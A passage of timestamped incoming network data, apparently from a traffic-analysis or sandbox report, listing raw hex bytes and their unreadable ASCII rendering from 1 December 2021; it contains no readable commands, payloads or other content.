d1 02 a4 da 2c 7d fb af 70 f1 af d2 14 1b 92 Data Ascii: D=S[n%F=1jyC^JaK~[n#'#l+2`eOvXY+oh4_ziBn9)>WQ6=Keb7BV7Il?\|T?^G:nNMV\qr<i,Mh06exek)VJBd(m'e",T,}p
2021-12-01 18:10:27 UTC	157	IN	Data Raw: 52 b9 75 cf b8 34 1a 50 d3 e9 b2 49 c0 dd 0f b4 64 9e 8d dc aa 2a d7 c9 74 6f 5d 2a 92 75 4e 24 1c 92 2a db e7 99 5c 31 cf 64 a8 f5 c4 20 43 fe b7 56 6d 3a 20 2e 43 11 b7 b0 e0 43 30 39 a5 e3 a0 dd 59 96 73 20 1a ab c5 3d dc 1b e0 3a 37 bc cb ec ca 36 4b 2b 34 ee 9e 74 34 7a 31 dd 5a ea f2 5b 9d 3c a1 a4 e3 57 ef 7c 9a 73 1f c1 e8 fa 5c f4 dd e9 68 10 b3 a1 fb bc 20 d8 39 1a 76 bb de e2 ed 8a e5 05 98 da f2 74 79 c6 fa c4 55 4d 8a fa 92 91 e7 10 cb 03 e3 90 e3 f9 b2 e7 e0 04 aa 9f 34 93 a3 5f 07 04 94 91 f3 f6 d4 d7 ef 52 6b 9c 08 36 86 7b 2f 2f 0f 47 0b b2 96 53 f9 cf fe 6c 4b e7 3c 25 81 b7 ba d2 74 cf 20 42 e7 3d e6 8f db d7 ac 3f 0a e6 35 9f 29 db 50 01 78 94 d5 0d bd 93 23 07 eb 98 ca ec 23 31 5d 31 d5 4b ab 83 0b 4d 5c 16 a9 59 74 75 80 7a 48 32 9d Data Ascii: Ru4PIdto]uN$*\1d CVm: .CC09Ys =:76K+4t4z1Z[<W\|s\h 9vtyUM4_Rk6{//GSlK<%t B=?5)Px##1]1KM\YtuzH2
2021-12-01 18:10:27 UTC	159	IN	Data Raw: 39 2e e0 ea e1 3f 0d 39 33 0d e9 d2 74 86 8a a9 dd df 47 56 ac b1 7c 09 09 92 fb a3 82 b0 1b b9 54 f2 2b af 10 4a 9b be cb e1 cf 1c ab 16 83 67 dd da b3 39 ec a7 23 91 74 39 d2 7b ee 5b 9a ca 1d db e8 05 60 97 61 e9 f5 8e 71 de 05 e7 2c 59 9a 40 65 a1 48 d3 c2 0c 5e b8 00 10 0b c5 5b 23 10 b7 80 b6 72 d1 3d 28 92 fd 34 97 b9 68 8a b1 cf 14 a3 f1 85 9b 2e 55 0f f2 5c 38 ee 41 cc cf a3 a0 68 1a ce 19 84 3a 66 61 03 99 cd 9e 6a 67 63 d5 13 f2 7b ee a9 01 03 41 49 a5 3e 82 c9 1b f4 6d 66 40 6a 2e 6b 63 44 7b 9a 15 c1 43 a8 f3 17 c2 ae 24 f7 30 50 fd cb e9 1b 93 31 07 f2 e6 97 50 a0 99 c3 f3 8c b0 8a a5 d6 4c 83 c8 35 a8 11 b8 12 ff 2a b2 b9 37 fa 87 6e f5 93 ee 45 c6 9c 69 d4 f5 1d be 3c 02 c3 88 34 95 36 e0 2f d3 d9 f4 7d c6 b1 1d 6c d0 0e 21 c0 cf c6 da f2 Data Ascii: 9.?93tGV\|T+Jg9#t9{[`aq,Y@eH^[#r=(4h.U\8Ah:fajgc{AI>mf@j.kcD{C$0P1PL5*7nEi<46/}l!
2021-12-01 18:10:27 UTC	160	IN	Data Raw: 08 fb 1b 88 31 ae 27 bd 1a 23 90 2b da 34 f2 0c 9a 9a eb 79 74 88 2e 7f 4d 95 f2 e2 07 e1 91 8b 7c 9e f9 2b 02 c7 25 7f f2 f7 9f 94 05 30 e8 ce 19 67 ba 71 c0 6a 2b 9e 02 ef d1 8b 87 d1 67 f6 95 16 75 16 99 6a 73 01 52 53 63 d3 7c c0 3c f7 57 35 bf d4 83 48 78 71 9f 0d 0c 90 23 e6 57 1f 5d 33 ea 1f 53 e0 fd 8f 9a 20 d2 87 b5 98 11 fb 67 69 0e de ba 4e e0 35 71 5c ad c2 60 30 ea c9 fa 8f b2 d7 b7 17 16 03 dc 91 9f 22 71 6d 44 8c 5c af 85 e1 73 47 a3 5f 86 65 a5 f9 59 32 6f 54 aa c6 e8 93 3a 4b fb b3 10 5b c2 b9 13 7c de 18 a4 56 2e 51 e8 4a e7 19 ab ac 5a 24 3a 86 24 70 02 ab 88 30 38 63 28 b4 62 fa 8e ed 3b 0b 2c 63 37 25 cb 1a 1a 34 d9 c0 18 33 44 df fb 5a 4a 09 0c 73 8b 4e 9a 2e 53 31 47 3f 5b 51 c3 6a 37 f4 4b 51 df f8 a4 4f 42 0b 66 50 42 3c 8f c8 65 Data Ascii: 1'#+4yt.M\|+%0gqj+gujsRSc\|<W5Hxq#W]3S giN5q\`0"qmD\sG_eY2oT:K[\|V.QJZ$:$p08c(b;,c7%43DZJsN.S1G?[Qj7KQOBfPB<e
2021-12-01 18:10:27 UTC	161	IN	Data Raw: 4a 3d 39 df 00 9b 5d 97 eb 76 1b 33 89 08 df 97 5e f2 67 c0 9d b2 5b 59 98 7f 9c 42 3a 50 c4 bc 57 6e 6c 6c 5e 55 0e c2 5a cd 1a 5a a5 cd 65 06 0d c3 69 8c 90 9d 31 1b 14 d9 bd 83 15 3f fd 4a a6 fd c8 b3 16 52 43 5f fc de 03 77 c4 dc af 26 49 5d 98 9f e8 ca fd 09 6a eb 76 50 3c 48 1e 9f d8 33 47 8a e9 e6 55 7c 22 11 06 9a 23 e8 71 e6 37 ae eb 07 12 69 42 70 bd 28 a8 05 d9 71 22 56 a4 64 08 96 23 ed 80 5f e2 71 f2 1d 4f 96 63 46 53 18 e8 e6 66 78 64 83 58 97 66 aa d4 13 b8 a7 3c 94 45 09 ca a5 74 d0 d3 90 08 8e f4 d6 62 72 72 b8 03 d7 de 25 1a dd 67 4b c9 64 51 2b e4 44 01 7c 5f fa e6 9a 64 c6 b5 51 e8 5e 18 0f 01 b4 af 5d 92 58 f7 bc b7 c9 49 30 7d ef ec fd 5e 9e 64 e1 3e 63 9e b1 d7 cd 29 82 32 1e c3 2d a9 ec f9 fd a6 f3 e2 8a f0 3c b0 7d 8a 36 70 81 43 Data Ascii: J=9]v3^g[YB:PWnll^UZZei1?JRC_w&I]jvP<H3GU\|"#q7iBp(q"Vd#_qOcFSfxdXf<Etbrr%gKdQ+D\|_dQ^]XI0}^d>c)2-<}6pC
2021-12-01 18:10:27 UTC	162	IN	Data Raw: 6f 7f e7 e7 4c bb be 1e a8 97 81 bd ff 9a 17 2f fb 0b 43 68 d2 e3 79 ac a9 0c 29 30 4e e0 6c 8a e7 50 a6 4a 24 68 46 18 b4 9d 5d 84 07 9a a3 37 7a 05 c7 5d 80 1f 22 93 a8 40 74 46 5a 98 82 b9 b0 76 ff 16 15 bd f2 fa d1 01 c3 cb d0 04 c3 f9 a3 03 54 77 e8 4b 5a f1 98 b5 5d a9 d4 e5 2b ac 83 06 68 18 d8 23 aa f2 4f 17 3b 03 22 5b 7e 76 c2 db 29 5b 0f bb 76 f6 fe 2a cc 98 bb 26 cd b4 7e 19 b7 50 33 c5 f2 d9 c1 7b b7 72 2a ab 6c bf aa 34 af 75 da 3d fe 79 cf 07 bd 0b cd d5 57 c0 ac d6 1e 89 4f 81 41 7c be cf aa 52 d2 52 6c d7 7c b6 e2 36 11 cb e4 0f fe 0a e7 99 d4 4b 3e cc fc dc df de de 80 4b c9 49 88 c0 39 48 e5 c4 b0 63 c8 2f 1e 1d b1 9c b0 74 3e 00 a0 b6 6c fc 2d 63 5c 20 c2 c7 83 dd 3b 55 d4 bb 0a 1d 2a e4 96 9d 43 71 3d 14 36 d6 f8 31 be 82 ac e4 cd 41 Data Ascii: oL/Chy)0NlPJ$hF]7z]"@tFZvTwKZ]+h#O;"[~v)[v&~P3{rl4u=yWOA\|RRl\|6K>KI9Hc/t>l-c\ ;U*Cq=61A
2021-12-01 18:10:27 UTC	163	IN	Data Raw: c8 2b 72 a3 67 3b a5 68 b4 fd 46 55 60 84 1d 83 a5 80 47 50 f1 1a df 11 a2 c9 eb cc f1 f9 05 f9 b7 4e e3 a7 ef 6b aa 4b dc 01 59 04 d4 34 ab 52 ab 2b b1 c8 01 81 ad 0e d5 41 6d 75 a4 ca e4 53 85 5c dd 62 8f 4a ea 1d 50 a7 a6 63 50 16 80 1c b0 9c db 73 02 31 f4 5d 59 6f a4 57 b7 66 1b 15 54 05 c4 65 f6 17 d2 7c 3b fe 43 7b 2a e6 b1 8f 21 e5 1c 4b ab 1e 93 16 62 b8 ba ad e6 21 b9 19 5e 99 c4 7d 80 22 b1 81 14 67 3d 8a 94 48 2b 3c 6b 89 02 93 75 fb a3 b7 0e bf e6 7f 73 78 f3 ab cd 40 ff 87 3b cc bd f5 ba 11 c9 40 c7 d6 97 8a ea a6 7a 87 aa 27 19 4e b9 63 6a f5 6b f4 7e 91 2e 6c ee 98 02 45 32 ad e9 1d 57 0b 2d 50 98 37 05 31 05 d8 14 0f 44 a0 3f f6 34 1f 03 64 27 7c 8a c9 72 d7 44 91 c3 0e 6a 83 e2 a8 6c b0 36 32 36 ac 1e ad 08 43 8d 0b cc 0b c9 37 a0 a6 af Data Ascii: +rg;hFU`GPNkKY4R+AmuS\bJPcPs1]YoWfTe\|;C{*!Kb!^}"g=H+<kusx@;@z'Ncjk~.lE2W-P71D?4d'\|rDjl626C7
2021-12-01 18:10:27 UTC	164	IN	Data Raw: 30 48 57 ea 44 51 10 00 0b 35 57 ae cb 0d 71 4c ce 78 3c 1c b8 63 6d e4 24 7e f0 21 ee 22 9c 5c 32 18 40 8d 09 6a 76 32 17 84 a0 04 4e 24 a1 ce 2b fb 6e fe 06 fc 34 e7 10 2e 4d 3c 09 1f 78 56 32 92 aa 1e 7f 83 a8 1c 1f 10 28 41 02 b0 77 4f f0 5c a6 a9 14 97 a9 9f ac fe 9f df 2d 71 50 77 50 fc cf 27 8d 92 29 8c 1d a9 ed d2 a9 c7 78 b3 69 1b 52 6c 0b 97 a8 bb 95 ab a2 95 0f 59 7f cd 83 48 d8 e3 53 a4 9f 60 a8 3a 51 4f 31 c2 b0 33 c0 ef 66 ff 2b 85 d2 08 3a 0c da 5c 31 73 c2 8e 9c c0 aa 23 10 58 58 b9 47 d6 0a c3 4f 77 f6 1c c3 92 d9 59 19 be ff 1d a8 f0 b9 91 88 df 39 61 de 86 00 fc 77 6d a7 6c 1b 2c aa 81 3e 49 99 3e df e6 70 a3 57 52 a9 06 e3 5e 37 67 2c 3b b3 3f cc 54 ca 5e d9 67 a6 c3 aa d6 7b e1 69 1f 51 b0 26 f2 30 fe d5 e5 72 b8 e8 6c ed 96 60 a8 05 Data Ascii: 0HWDQ5WqLx<cm$~!"\2@jv2N$+n4.M<xV2(AwO\-qPwP')xiRlYHS`:QO13f+:\1s#XXGOwY9awml,>I>pWR^7g,;?T^g{iQ&0rl`
2021-12-01 18:10:27 UTC	166	IN	Data Raw: cb ff 7b e2 a1 01 eb 42 54 bb f6 51 74 f8 7d 6f 19 d4 74 be 60 b3 cc be e7 21 98 10 3c 91 38 7c 70 8d 8f 89 79 b2 09 a1 e6 ed 87 49 7e b8 a5 ae b5 44 94 60 ef 76 39 9e a3 cf c2 3e 91 38 66 92 73 f9 f4 76 fb 2f d2 cd e2 7c 17 13 49 eb 1b a1 b9 f2 1a ac 58 3f d1 56 4a 64 b4 f1 af b5 40 5c 60 06 33 cf 8f a9 f9 4b e9 e1 94 0e c9 1b 45 f3 55 f4 5b 63 40 cc eb 7a b1 3f 3b bb f1 ab 1b c8 e3 0c b3 8c 79 58 4f 60 a3 a5 7f c5 6d 96 5f f4 f6 45 55 e7 81 58 33 95 77 5d be b5 b9 35 81 c8 70 1c 32 6b 6e 12 a9 81 54 ba 68 0b 88 7f 27 82 79 e0 7a e7 79 8a ea 50 70 54 65 e8 88 61 ea 55 7e a5 1f d3 bd 2a 8d 3f aa a6 63 e0 2c 0e 8c 84 f5 9b d8 23 95 07 56 7b f6 ee 32 6d e8 20 09 16 92 31 3d b1 f5 a4 bf f5 80 04 c8 b2 bc 85 01 98 d1 07 cd f5 7c fc 24 4c 57 8f 7d e9 dc 88 b7 Data Ascii: {BTQt}ot`!<8\|pyI~D`v9>8fsv/\|IX?VJd@\`3KEU[c@z?;yXO`m_EUX3w]5p2knTh'yzyPpTeaU~*?c,#V{2m 1=\|$LW}
2021-12-01 18:10:27 UTC	167	IN	Data Raw: a4 cf 06 fb af 9d 09 28 35 90 6f 31 75 8a f8 31 d8 e3 8d 01 3a dc 64 b9 d8 c5 3e 5c e9 d4 77 74 0f 23 2c 34 20 df 96 cf 4c 8d 1e 9a c1 cd 31 54 fb 15 10 4b 0c e0 11 fe 04 99 87 82 bf d0 e9 a8 87 39 5c 33 fb f1 ce d5 b2 fb 05 f9 97 fb 91 57 c6 12 d0 51 af 1e 98 00 2c 33 04 64 5a 9b f8 a3 1f af fa 3b e5 17 68 e5 0d b8 43 43 5e 27 29 16 cb 73 ff 62 15 40 04 53 74 5a 08 f7 3f f7 23 7b 5c 51 77 0f e4 05 16 4c 3a 93 68 69 9b 64 9c d9 14 4d af fe 03 0a 17 1b 1c 56 e1 e8 c0 c2 72 f0 29 5e fe 99 b3 fa 63 4e 09 1e d3 07 f5 9b fb fc 79 da 12 6a 07 2d 52 bb c2 51 cc 4b 9b 6f 0f 27 6d 9b 97 ae 6c e7 39 91 95 09 59 6b d4 a6 4a de fe cc 72 ad f5 af 98 1b 48 03 58 b5 33 11 ee 54 2a 2d 1b a1 0b 44 13 dc 14 54 72 fb 91 9a 17 be bb 28 58 5e b9 8c 13 3b c1 49 6a 84 c2 53 3d Data Ascii: (5o1u1:d>\wt#,4 L1TK9\3WQ,3dZ;hCC^')sb@StZ?#{\QwL:hidMVr)^cNyj-RQKo'ml9YkJrHX3T*-DTr(X^;IjS=
2021-12-01 18:10:27 UTC	168	IN	Data Raw: 5e a5 9a 3a 22 9c c6 de b4 8f eb 0f bd 6c f3 3b 89 46 6c 39 ba c3 e8 db 01 ab 03 10 73 ce f0 51 3e 2f a4 33 9d 77 36 e0 4f 49 7c bb ce 5d d2 2d c2 b5 50 ae 28 22 7e 1a 13 cf 0a 9e 97 8b bc be 7e 85 02 1e c5 24 7c c9 e1 bf 00 54 ff c7 66 7d 77 bc 00 6b e5 59 03 99 51 91 b4 58 62 1b d5 74 37 cd 6c c7 9f 95 0e 58 c7 2d 90 38 2b 5b 52 12 88 6f 97 70 ad 1e e4 89 17 72 28 b8 af 35 77 8f 50 9f 76 3d 9a bc dc c0 3f 91 21 cc 82 67 d8 86 ee f6 b3 df cc e2 db 0b 8b d4 ea 0d 61 d7 66 17 a4 48 87 4b 18 48 65 b4 2e 94 a5 56 5a c7 ca 0d df 15 f7 f9 d8 ca f1 87 0f 17 91 ae e1 46 f5 1f f9 4d dc e9 7b a0 ce 08 a8 15 a8 0a 82 3a 61 b1 8d 79 d1 56 6d 40 b2 f9 fe 48 85 c9 97 f6 88 40 ea 92 59 5d a2 00 59 ad b4 a5 f5 8e db 72 1d 23 df 51 4e c2 89 45 9c a0 78 8a 7e 27 e9 66 f6 Data Ascii: ^:"l;Fl9sQ>/3w6OI\|]-P("~~$\|Tf}wkYQXbt7lX-8+[Ropr(5wPv=?!gafHKHe.VZFM{:ayVm@H@Y]Yr#QNEx~'f
2021-12-01 18:10:27 UTC	170	IN	Data Raw: 5a 26 aa 5e 45 5c 8d 5a 4e 28 d8 b4 85 47 a3 a0 19 7c fd 71 60 6b 40 af 4c e0 fd 23 48 e3 af 2d b9 35 b9 61 cb c4 3f 35 6d 4b 02 cf 26 00 cb 99 8a 8e 3e ad d9 eb cd e2 24 90 2a 98 18 9c d4 bf e3 3a ea d1 d9 33 b6 d2 29 ea 5b c9 f1 17 45 04 fa af 02 0e 3b 45 97 7c 43 51 4f e9 ad d8 f7 8a 4a 7c d8 40 e7 cc d6 19 5d e9 a6 76 43 26 32 2a 5e 0b b1 65 cb 6f 17 18 89 c3 9b b2 26 bc 03 58 16 22 fb 33 eb 28 cf 07 1d bd c5 83 fd 5d 78 4a 29 f2 a7 4e 04 b3 ee 2a af 51 33 ff 49 51 4b 75 12 ad 0b b4 56 af ca 0b 69 5c e8 89 3e 38 ba d6 6d 65 25 7f f0 67 ed a7 81 f2 3d 20 40 4b 09 eb 77 3a 16 c2 a3 2c 44 35 ae 9a 29 36 6e 70 07 f4 35 a1 13 53 41 87 06 4b 7a 99 32 1c ab 16 7e 85 b0 a9 3b e1 2a 15 00 61 77 c1 f1 5d a6 ef 17 9d a1 5d a3 c6 9f 08 2d ff 51 76 50 ba cc 0f 87 Data Ascii: Z&^E\ZN(G\|q`k@L#H-5a?5mK&>$:3)[E;E\|CQOJ\|@]vC&2^eo&X"3(]xJ)NQ3IQKuVi\>8me%g= @Kw:,D5)6np5SAKz2~;aw]]-QvP
2021-12-01 18:10:27 UTC	171	IN	Data Raw: 5d 99 45 bd 83 0c bc 42 8b d8 94 17 6a 69 9f 4b 84 a0 83 a9 14 83 04 d5 89 71 14 f8 dc 28 25 b3 68 9e 73 d5 f0 ff 18 42 62 2e d2 08 b5 6e 0a 82 49 be a9 e9 a5 42 23 b3 cf 85 7a 71 86 ff fb 39 16 33 0f 3f d0 7f 36 00 8e 96 c9 60 4b 5f b3 9a 48 30 26 01 d0 44 92 9c 0f 1d 66 f2 2a 89 34 7e b9 af fe 18 ca 2b ab 97 82 72 df d0 a2 2f e2 de 3e 27 7f 1c e0 ab dd 7d aa ee 2f c0 fc b8 b8 cc aa 02 22 52 8f 12 de 2a ec 85 51 fe b5 3e 9f 28 1e a1 b1 7d d8 c1 cd 12 8b fd cd 96 6c 5d bc 44 fc e4 48 23 eb 43 74 23 56 b9 19 ff 74 63 55 6d d1 bf e7 1c b3 85 26 07 22 01 5b 9e 8b 89 79 b7 02 bf e4 de 93 cc 70 02 b8 e3 af 76 99 70 ed 64 39 5a ae 11 da 15 91 ad 56 83 71 f8 f4 fc fd c7 fe 3c f3 f1 0b 1f 48 eb 1b 41 a5 74 07 d7 4c 5c f9 6c 48 31 a9 2f 85 a5 42 4e 60 b0 1d af 85 Data Ascii: ]EBjiKq(%hsBb.nIB#zq93?6`K_H0&Df4~+r/>'}/"RQ>(}l]DH#Ct#VtcUm&"[ypvpd9ZVq<HAtL\lH1/BN`
2021-12-01 18:10:27 UTC	172	IN	Data Raw: 7a f5 a1 b9 72 49 b9 ed 7a 46 79 7e 73 ca 01 92 f4 e2 41 21 25 18 f3 1d 5f 1a 2c fd 85 7a 05 b5 54 6c 0e 04 46 af 29 1c 39 f9 00 3d 02 c0 c9 da 72 2c 51 93 e2 eb 67 e9 ff e0 45 6a 75 89 2b a8 37 b9 00 96 a5 46 e4 54 c9 d0 f3 a3 86 7a 54 ad 02 a4 70 4d d3 94 28 d0 d0 84 51 ab d2 1e 2d c7 79 45 cf 99 af 70 84 fc 35 40 f7 ae 7c f1 3d 47 d7 12 c4 77 51 6c 5d 0a bd 21 57 be b4 af 44 e6 ad a5 8f cc f4 2c 84 2b cf 91 b1 2a 56 3b 3a 62 95 d8 32 b6 a0 2e 9e 7f d8 df a2 8c 04 46 eb 03 08 3b 37 90 67 7b 40 d7 d2 67 d8 3f ce 4b 38 da 64 f5 d7 6a 29 78 ed f7 76 bf 61 33 2c 46 21 92 9c 03 5f e9 19 d8 c3 93 f4 27 fa 00 3c 1b 84 e3 08 ce 2c 9d 07 21 fb c4 c5 fe 07 75 53 17 c9 59 4f 56 b3 a6 6c ae 17 30 96 44 e2 d5 5f 3c ac 58 b4 2a e9 cb 0d 71 76 cb 70 9c 12 22 d5 3e 65 Data Ascii: zrIzFy~sA!%_,zTlF)9=r,QgEju+7FTzTpM(Q-yEp5@\|=GwQl]!WD,+V;:b2.F;7g{@g?K8dj)xva3,F!_'<,!uSYOVl0D_<Xqvp">e
2021-12-01 18:10:27 UTC	173	IN	Data Raw: d8 10 9f bf ff d5 bf e1 b9 fe 89 e3 1b a5 df 0b 86 fd 77 61 a3 7d 1b 43 ab 7e 1d 81 98 82 58 e7 70 6a 4e 54 a9 13 e6 a3 37 ad 2d e5 34 3e cc 62 ce 58 c1 4c 81 12 89 1c 7a d3 ef 1e 51 b4 3d f4 28 d5 f2 3a 51 72 e9 ea 6b 97 60 c8 01 59 71 7e b2 d3 63 cd 43 d7 50 95 04 6a 84 ae bb e7 8b 90 d1 64 82 4c 5f 88 62 14 bb df f3 33 9e 7b 7a 06 d4 ac 74 19 51 62 d7 ca 18 cc 45 7c 1d 3d bf 19 62 a4 51 23 a7 de 33 0c 5a 10 d0 8c 38 a2 11 0f 2c d0 e0 31 ae a0 99 da cc 3c 5e 2b 16 49 23 26 ce b3 b7 f1 b7 8f 9c 1d f3 da 05 35 6d b9 b8 c9 f0 f1 24 b8 03 e1 73 f4 5d a3 3c e2 ac 59 9e 19 26 f3 4f b8 7c 90 63 2e d3 fc ca fd 53 dc 29 dc 7f eb 13 96 a7 ed 96 51 b4 a3 66 b5 27 98 c5 d5 7c 64 4c cc 01 8b f7 dd 66 0f 76 97 24 9a e5 58 ad ea 50 74 bc 42 62 69 d4 45 13 3c 6c 6d 31 Data Ascii: wa}C~XpjNT7-4>bXLzQ=(:Qrk`Yq~cCPjdL_b3{ztQbE\|=bQ#3Z8,1<^+I#&5m$s]<Y&O\|c.S)Qf'\|dLfv$XPtBbiE<lm1
2021-12-01 18:10:27 UTC	175	IN	Data Raw: b9 e0 7f 10 ec 45 72 16 e2 2b 8d 5c f4 12 20 b0 18 93 a3 6d 15 90 8e 60 7d cb ac f0 a9 c4 eb 9d de bf 8b 3e 71 3e 76 e1 33 09 28 77 89 02 95 63 23 c5 f2 2e b2 9b 82 86 96 c1 bd cd 1f d8 51 61 cb 0b 66 d7 a4 73 89 c6 63 bf 5c d4 b0 08 bf ff fa 4c 48 45 32 7b 40 71 f2 68 83 14 de 00 95 7f 20 65 f8 f2 1b 57 86 37 3d 91 36 5b 36 6a 6d 86 e4 47 a9 21 f6 25 b0 73 70 a9 56 f7 db 1e cd 50 95 ea 1c 7b 29 8d ad 8e 88 4b 88 3f 4a 36 bf 08 77 ba 0f f1 1e d9 27 cd a2 26 91 55 ab 0a 4a 6f 8d 4c d8 a3 c8 e9 85 31 47 d3 18 25 f2 42 60 b9 d6 d1 67 bd fd dd b0 f6 a8 74 b6 06 b9 c2 5b ba 14 68 6d e9 28 bd 27 5f c4 ba 92 6a 8c be d9 b6 cd 90 df 85 2d c7 17 af d4 25 75 e2 c1 ac d9 da 42 a1 28 96 54 fa f1 d1 dd f4 d1 d2 02 40 cd 36 96 6f 43 62 4f c5 30 d2 db f7 4a a4 2d 65 f3 Data Ascii: Er+\ m`}>q>v3(wc#.Qafsc\LHE2{@qh eW7=6[6jmG!%spVP{)K?J6w'&UJoL1G%B`gt[hm('_j-%uB(T@6oCbO0J-e
2021-12-01 18:10:27 UTC	176	IN	Data Raw: 92 29 05 88 7e ce 4a 4e c7 05 b7 14 0d 57 6c 0b 8a 3e 6c 1c 3a 45 95 72 59 e6 d1 96 48 d8 fe c5 73 8f fd 4f 9a 2c 4f 85 58 b1 33 c0 ef f0 28 9d 19 35 08 47 0c 15 16 24 73 c2 93 0a 17 cd a8 f7 58 25 b9 ad 16 0b c3 4f 6a 60 c3 23 22 3e 5e 64 be f9 d6 bd f0 b9 8c 1e 3c a8 c1 39 81 7d fc 55 62 a1 6c 1b 31 3c 6f 19 f3 7e 3e a3 e6 4e 69 4c 52 a9 07 77 b0 c2 c9 cb 3b cf 3f 96 61 cc 5e d9 66 32 31 f1 6e 9c e1 15 1f 24 b7 3f f2 30 ff 41 13 8a 15 0f 6c 91 96 f0 cb 03 58 69 54 01 83 c5 bf a5 89 a5 94 a8 69 86 af bb 95 1c 83 e4 02 64 06 a8 89 a5 17 b9 de f3 27 0f 68 d5 74 32 f2 82 18 b2 61 d5 db 18 be d2 0a 61 5b 59 ab 94 a5 ae 20 a5 c8 33 7e cd 86 0a fe de 14 4e 0f 36 d4 e2 37 b6 8a 2a c9 6a 55 b8 b1 e7 48 15 22 cc d5 b4 83 20 0f 9e 68 15 28 f4 34 3f bd ba cf e8 db Data Ascii: )~JNWl>l:ErYHsO,OX3(5G$sX%Oj`#">^d<9}Ubl1<o~>NiLRw;?a^f21n$?0AlXiTid'ht2aa[Y 3~N67*jUH" h(4?
2021-12-01 18:10:27 UTC	177	IN	Data Raw: a8 6f d8 fc f7 70 0d b4 84 51 ee 55 f5 5b 99 db dc dc 49 57 cc 4f ab c8 a7 19 82 ce 01 27 8d 19 d7 a1 6f dc a4 22 f3 5b 85 5d f5 60 88 91 de 65 5b 4e a1 16 5d be b4 b9 96 18 db 4b 1c d4 dd 32 59 0a 8d 56 9c 74 1b 1c 7e 9d ef 91 f4 19 e1 bd 1d ee 43 72 02 73 9a 05 20 12 01 83 b1 fc 9e a1 7c 0d a0 3d e6 53 b1 4a 46 f6 c4 ed 93 dc b9 93 14 c2 2d c8 9d d5 2b 8b 76 a1 0c 97 75 23 b7 65 3e dd e1 64 50 35 c0 f4 c3 1d ce 51 13 5c bd 52 a8 42 d1 2b c7 09 b1 5e c2 b0 7a 28 a1 d7 39 ae bb 90 7a cc 7f f0 7e 83 00 4f f4 12 00 c6 27 65 f3 b5 59 84 21 3d 85 a7 05 2e 1d 8b 0c 79 46 79 2f f4 34 b0 01 e7 02 c5 88 3d 70 51 51 67 e4 1e 6a 29 ff 3a 45 c8 22 6e 29 d5 37 ab 07 75 ac 0f e5 8f c9 cf b2 44 84 07 54 9d 05 48 79 8d d3 4f 28 4c 80 63 53 d6 d2 4f 2a f0 54 60 cb 41 af Data Ascii: opQU[IWO'o"[]`e[N]K2YVt~Crs \|=SJF-+vu#e>dP5Q\RB+^z(9z~O'eY!=.yFy/4=pQQgj):E"n)7uDTHyO(LcSO*T`A
2021-12-01 18:10:27 UTC	178	IN	Data Raw: b9 54 dc ea db 01 ab 95 90 f3 ed 36 a0 41 e2 a2 2b 9f 77 36 e0 d9 c9 04 ac 08 2d ae fc fa ad 52 ae 28 22 e8 9a fa ea cc ee eb 51 e6 a6 7c 85 02 1e 53 a4 58 d9 27 cf 7c 8b 83 df 64 7d 77 bc 96 eb 40 4e c5 e9 2d 74 2a 40 60 1b d5 74 a1 4d 1b d0 59 e5 72 b3 77 35 92 38 2b 5b c4 92 91 7e 51 00 d1 e4 36 93 15 72 28 b8 39 b5 de 98 96 ef 0a 39 6f b8 de c0 3f 91 b7 4c cd 76 1e f6 92 fd a4 da ce e2 db 0b 1d 54 3c 1a a7 a7 1a 07 ed 4d 85 fb 46 48 f3 b4 fe 82 43 40 20 60 a0 09 dd 8d a8 f9 4e ca 86 94 e9 cb f9 48 67 42 f7 5b 99 4d 4a e9 85 b8 28 30 d6 f3 0c 0e 80 ce 01 b1 1b 79 75 45 8b a3 d9 7f 36 4c 87 5d f5 f6 1e 40 dd 97 bf 31 dc 69 ba a9 b6 b9 96 8e 4d 72 d3 30 39 4d 24 ab 8c 42 9e 74 1b 8a e8 27 96 63 10 66 9c 7f 3e fa 41 72 02 e5 0c 89 d9 f6 e5 fc cc 18 c3 b5 Data Ascii: T6A+w6-R("Q\|SX'\|d}w@N-t*@`tMYrw58+[~Q6r(99o?LvT<MFHC@ `NHgB[MJ(0yuE6L]@1iMr09M$Bt'cf>Ar
2021-12-01 18:10:27 UTC	179	IN	Data Raw: 74 62 cb d7 af da c0 9d 30 a6 f5 d5 74 f5 30 bb d6 5c c4 a9 15 6a 70 ec bf 5a 5f a1 9c 88 40 a9 ad 4f cb 47 f1 ca 86 50 c7 90 99 d6 57 74 3a 7c d1 39 02 50 a2 55 96 fc cc f3 a3 dc 04 6c af c0 0d dd 35 eb 6f 89 54 4d d1 37 d8 61 8a 40 09 3c 66 8e df 3a 1c 5f e9 a6 76 d5 25 de 29 a0 23 e9 94 c7 6b 15 18 89 c3 0d b1 12 cb e6 3e 60 8c c4 37 e9 28 cf 07 8b be e2 c3 18 05 0e 5b 77 f6 a5 4e 04 b3 78 29 a6 25 d6 94 3f ea 37 71 10 ad 0b b4 c0 ac 9b 0b 97 74 b0 78 a9 3c b8 d6 6d 65 b3 7c 7c 13 08 c1 f7 5c 85 24 42 4b 09 eb e1 39 6d 82 46 74 32 24 79 9e 2b 36 6e 70 91 f7 d9 d3 f6 38 37 3c f0 4f 78 99 32 1c 3d 15 59 82 4e 81 63 10 33 12 02 61 77 c1 67 5e 0e af f2 fb d7 9f 91 c1 9d 08 2d ff c7 75 2a fd 29 57 f1 92 76 27 1c 7e ed 42 3e c5 64 b0 8f 0d 28 6c 8a a8 aa 6c Data Ascii: tb0t0\jpZ_@OGPWt:\|9PUl5oTM7a@<f:_v%)#k>`7([wNx)%?7qtx<me\|\|\$BK9mFt2$y+6np87<Ox2=YNc3awg^-u*)Wv'~B>d(ll
2021-12-01 18:10:27 UTC	180	IN	Data Raw: d1 15 82 92 d5 b3 79 f2 b9 a3 f3 a3 b5 6a 7a 77 d4 66 ff 92 55 84 d5 a6 18 18 68 08 3e 4c bf 3f e9 ad 71 c5 a5 b5 33 b6 77 84 f3 fd 38 80 33 bb 28 36 e2 4a b6 63 90 cb cc 4d 5e 25 9a 6d 02 c0 cc a8 b4 89 9b 0d bd 6c f3 bc 89 ea 69 5f ba b2 e8 f7 2c a9 03 90 73 49 d0 fa 1d 04 ae 42 9d 39 1b e2 4f c9 7c 3c ee 27 d6 1a c8 c4 50 de 05 20 7e 9a 13 48 2a 2e b7 b7 b6 cf 7e 17 2f 1c c5 a4 7c 4e c1 f4 04 6d f5 b6 66 c9 5a be 00 eb e5 de 23 28 75 92 be 29 62 cd f8 76 37 4d 6c 47 bf 84 0a 55 cd 5c 90 c0 06 59 52 92 88 ef b7 08 81 02 ee fa 17 6b 06 ba af b5 77 0f 70 60 72 df 91 d1 dc fa 11 93 21 4c 82 